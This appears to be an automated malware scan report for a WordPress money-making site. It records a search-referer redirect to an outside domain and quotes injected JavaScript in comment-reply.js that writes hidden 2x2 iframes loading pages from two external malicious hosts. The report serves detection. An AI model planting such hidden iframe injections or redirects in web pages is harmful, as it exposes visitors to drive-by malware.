Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://freecashsecretsonline.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: freecashsecretsonline.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Sat, 26 Apr 2014 01:20:04 GMT Location: http://vcminden.de/mzmd.html?h=575374 Server: nginx/1.6.0 Content-Length: 296 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://freecashsecretsonline.com/ | 200 OK Content-Length: 32621 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. Decoded script: <!-- ALL ADSENSE ADS DISABLED --> <p style="text-align: center;"><a href="http://freecashsecretsonline.com/wp-content/uploads/2011/10/freecashsecrets2.png"><img class="aligncenter size-medium wp-image-220" title="freecashsecrets2" src="http://freecashsecretsonline.com/wp-content/uploads/2011/10/freecashsecrets2-300x150.png" alt="" width="300" height="150" /></a></p> <p><center><iframe width="560" height="315" src="http://www.youtube.com/embed/qGKfR_3GlPI?rel=0" frameborder="0" allowfullscreen></iframe></center></p> <div style="text-align: center;"><strong>You are going to learn one of the most powerful</strong><br /> <strong>and easiest ways of making money. FULL STOP Period.</strong></div> <div style="text-align: center;">The fastest known wa ...[2495 bytes skipped]... | ||
http://freecashsecretsonline.com/wp-includes/js/jquery/jquery.js?ver=1.7.2 | 200 OK Content-Length: 94861 Content-Type: application/javascript | clean |
http://freecashsecretsonline.com/wp-content/plugins/downloads-box/mydownloadsbox_frontend.js?ver=3.4.1 | 200 OK Content-Length: 399 Content-Type: application/javascript | clean |
http://freecashsecretsonline.com/wp-includes/js/comment-reply.js?ver=3.4.1 | 200 OK Content-Length: 1098 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://vcminden.de/mzmd.html?j=575374></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://turknet24.com/oamd.html?j=575374></iframe>'); addComment={moveForm:function(d,f,i,c){var m=this,a,h=m.I(d),b=m.I(i),l=m.I("cancel-comment-reply-link"),j=m.I("comment_parent"),k=m.I("comment_post
Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://vcminden.de/mzmd.html?j=575374
<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://vcminden.de/mzmd.html?j=575374>
Hidden iFrame found. size: 2x2 src: http://turknet24.com/oamd.html?j=575374
<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://turknet24.com/oamd.html?j=575374> | ||
http://freecashsecretsonline.com/wp-admin/js/password-strength-meter.js?ver=3.4.1 | 200 OK Content-Length: 374 Content-Type: application/javascript | clean |
http://freecashsecretsonline.com/wp-content/plugins/s2member/s2member-o.php?ws_plugin__s2member_js_w_globals=1&qcABC=1&ver=111017-3204694224 | 200 OK Content-Length: 20548 Content-Type: text/javascript | clean |
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 21987 Content-Type: text/javascript | clean |
http://toolbar.cdn.gigya.com/v2/toolbar.js | 200 OK Content-Length: 30552 Content-Type: application/x-javascript | clean |
http://freecashsecretsonline.com/wp-content/plugins/visitor-country/visitor-country.js?ver=3.4.1 | 200 OK Content-Length: 89 Content-Type: application/javascript | clean |
http://freecashsecretsonline.com/contact | 404 Not Found Content-Length: 11812 Content-Type: text/html | clean |
http://code.jquery.com/jquery-1.9.1.js | 200 OK Content-Length: 268381 Content-Type: application/x-javascript | clean |
http://freecashsecretsonline.com/cgi-sys/js/simple-expand.min.js | 200 OK Content-Length: 2782 Content-Type: application/javascript | clean |
http://freecashsecretsonline.com/test404page.js | 404 Not Found Content-Length: 11812 Content-Type: text/html | clean |
http://freecashsecretsonline.com/members-area | 404 Not Found Content-Length: 11812 Content-Type: text/html | clean |
http://freecashsecretsonline.com/special-offers | 404 Not Found Content-Length: 11812 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=freecashsecretsonline.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://freecashsecretsonline.com/
Result: freecashsecretsonline.com is not infected or malware details are not published yet.